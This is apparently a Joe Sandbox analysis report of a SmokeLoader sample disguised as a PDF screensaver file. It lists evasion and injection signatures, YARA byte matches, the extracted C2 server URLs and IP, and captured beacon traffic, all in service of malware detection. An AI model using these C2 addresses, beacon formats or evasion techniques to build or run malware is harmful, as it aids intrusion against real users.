Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3312.PDF.scr

Overview

General Information

Sample name:3312.PDF.scr
renamed because original name is a hash value
Original sample name:_i_300924_i_30_09_2024___UA973248410000000026006263312.PDF.scr
Analysis ID:1523195
MD5:4e30f8fa403546790a16a9b0e0c72f02
SHA1:a22f898920194c5e191abfd535fa79ee387fbd8b
SHA256:c62d2fd76a5742a08db7157ad38b2f0209a11e8e9cc698902dbf366913fae535
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after checking system information)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Query firmware table information (likely to detect VMs)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses an obfuscated file name to hide its real file extension (double extension)
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to read the PEB
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

  • System is w10x64
  • 3312.PDF.scr (PID: 6328 cmdline: "C:\Users\user\Desktop\3312.PDF.scr" /S MD5: 4E30F8FA403546790A16A9B0E0C72F02)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • WerFault.exe (PID: 2228 cmdline: C:\Windows\system32\WerFault.exe -u -p 2580 -s 9020 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • djjergw (PID: 180 cmdline: C:\Users\user\AppData\Roaming\djjergw MD5: 4E30F8FA403546790A16A9B0E0C72F02)
  • explorer.exe (PID: 6480 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://unicexpertmagazine.pw/index.php", "http://ceoconstractionstore.pl/index.php", "http://openclehardware.ru/index.php", "http://informcoopirationunicolceo.ru/index.php"]}
SourceRuleDescriptionAuthorStrings
00000005.00000002.2038380670.0000000002160000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000005.00000002.2038380670.0000000002160000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x654:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000000.00000002.1761506014.00000000006A0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
    • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
    00000000.00000002.1761888720.000000000082D000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x3544:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000005.00000002.2038193053.00000000005E0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
    • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
    Click to see the 7 entries

    System Summary

    barindex
    Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\djjergw, CommandLine: C:\Users\user\AppData\Roaming\djjergw, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\djjergw, NewProcessName: C:\Users\user\AppData\Roaming\djjergw, OriginalFileName: C:\Users\user\AppData\Roaming\djjergw, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\djjergw, ProcessId: 180, ProcessName: djjergw
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-01T09:35:10.765857+020020391031A Network Trojan was detected192.168.2.44973645.143.201.1480TCP
    2024-10-01T09:36:16.864957+020020391031A Network Trojan was detected192.168.2.44973845.143.201.1480TCP
    2024-10-01T09:36:17.927460+020020391031A Network Trojan was detected192.168.2.44973945.143.201.1480TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: 3312.PDF.scrAvira: detected
    Source: C:\Users\user\AppData\Roaming\djjergwAvira: detection malicious, Label: HEUR/AGEN.1312571
    Source: 00000005.00000002.2038380670.0000000002160000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://unicexpertmagazine.pw/index.php", "http://ceoconstractionstore.pl/index.php", "http://openclehardware.ru/index.php", "http://informcoopirationunicolceo.ru/index.php"]}
    Source: 3312.PDF.scrVirustotal: Detection: 39%Perma Link
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.6% probability
    Source: C:\Users\user\AppData\Roaming\djjergwJoe Sandbox ML: detected
    Source: 3312.PDF.scrJoe Sandbox ML: detected
    Source: 3312.PDF.scrStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: C:\Users\user\Desktop\3312.PDF.scrFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49736 -> 45.143.201.14:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49739 -> 45.143.201.14:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49738 -> 45.143.201.14:80
    Source: C:\Windows\explorer.exeNetwork Connect: 45.143.201.14 80Jump to behavior
    Source: Malware configuration extractorURLs: http://unicexpertmagazine.pw/index.php
    Source: Malware configuration extractorURLs: http://ceoconstractionstore.pl/index.php
    Source: Malware configuration extractorURLs: http://openclehardware.ru/index.php
    Source: Malware configuration extractorURLs: http://informcoopirationunicolceo.ru/index.php
    Source: Joe Sandbox ViewASN Name: PATENT-MEDIA-ASRU PATENT-MEDIA-ASRU
    Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mvrswdonrbcmf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 260Host: unicexpertmagazine.pw
    Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hdfqubgmiehcd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 245Host: unicexpertmagazine.pw
    Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rsswvdbjffron.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 195Host: unicexpertmagazine.pw
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficDNS traffic detected: DNS query: unicexpertmagazine.pw
    Source: global trafficDNS traffic detected: DNS query: ceoconstractionstore.pl
    Source: global trafficDNS traffic detected: DNS query: openclehardware.ru
    Source: global trafficDNS traffic detected: DNS query: informcoopirationunicolceo.ru
    Source: global trafficDNS traffic detected: DNS query: api.msn.com
    Source: unknownHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mvrswdonrbcmf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 260Host: unicexpertmagazine.pw
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.18.0date: Tue, 01 Oct 2024 07:35:10 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 41 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 75 6e 69 63 65 78 70 65 72 74 6d 61 67 61 7a 69 6e 65 2e 70 77 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 1A2<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at unicexpertmagazine.pw Port 80</address></body></html>0
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.18.0date: Tue, 01 Oct 2024 07:35:10 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 41 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 75 6e 69 63 65 78 70 65 72 74 6d 61 67 61 7a 69 6e 65 2e 70 77 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 1A2<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at unicexpertmagazine.pw Port 80</address></body></html>0
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.18.0date: Tue, 01 Oct 2024 07:36:16 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 41 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 75 6e 69 63 65 78 70 65 72 74 6d 61 67 61 7a 69 6e 65 2e 70 77 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 1A2<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at unicexpertmagazine.pw Port 80</address></body></html>0
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.18.0date: Tue, 01 Oct 2024 07:36:17 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 41 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 75 6e 69 63 65 78 70 65 72 74 6d 61 67 61 7a 69 6e 65 2e 70 77 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 1A2<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at unicexpertmagazine.pw Port 80</address></body></html>0
    Source: explorer.exe, 00000001.00000000.1742331928.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1743944804.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2705554465.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2725520938.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2703383894.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2718077768.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2704102871.0000000008CC7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2704520251.0000000008D01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2711340708.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2905935716.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2706757154.0000000008D01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
    Source: explorer.exe, 00000001.00000000.1742331928.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1743944804.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2705554465.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2725520938.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2703383894.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2718077768.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2704102871.0000000008CC7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2704520251.0000000008D01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2711340708.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2905935716.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2706757154.0000000008D01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
    Source: explorer.exe, 00000001.00000000.1742331928.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1743944804.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2705554465.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2725520938.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2703383894.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2718077768.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2704102871.0000000008CC7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2704520251.0000000008D01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2711340708.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2905935716.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2706757154.0000000008D01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
    Source: explorer.exe, 00000001.00000000.1742331928.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1743944804.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2705554465.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2725520938.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2703383894.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2718077768.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2704102871.0000000008CC7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2704520251.0000000008D01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2711340708.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2905935716.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2706757154.0000000008D01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
    Source: explorer.exe, 00000001.00000000.1742331928.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
    Source: explorer.exe, 00000001.00000000.1746657492.000000000CA42000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
    Source: explorer.exe, 00000001.00000000.1746657492.000000000CA42000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
    Source: explorer.exe, 00000001.00000000.1743054691.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1744674085.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1743420076.0000000008720000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
    Source: explorer.exe, 00000001.00000000.1745816371.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
    Source: explorer.exe, 00000001.00000000.1742331928.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
    Source: explorer.exe, 0000000A.00000003.2703383894.0000000008BFE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2705554465.0000000008BFE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2718077768.0000000008BFE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2905935716.0000000008BFE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2707695380.0000000008BFE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2725520938.0000000008BFE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2681117571.0000000008BFE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2711340708.0000000008BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3kI
    Source: explorer.exe, 0000000A.00000003.2703383894.0000000008BFE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2705554465.0000000008BFE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2718077768.0000000008BFE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2905935716.0000000008BFE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2707695380.0000000008BFE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2725520938.0000000008BFE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2681117571.0000000008BFE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2711340708.0000000008BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirm
    Source: explorer.exe, 00000001.00000000.1742331928.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
    Source: explorer.exe, 00000001.00000000.1745816371.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
    Source: explorer.exe, 00000001.00000000.1743944804.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2705554465.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2725520938.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2703383894.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2718077768.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2704102871.0000000008CC7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2711340708.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2905935716.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2707695380.0000000008C9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
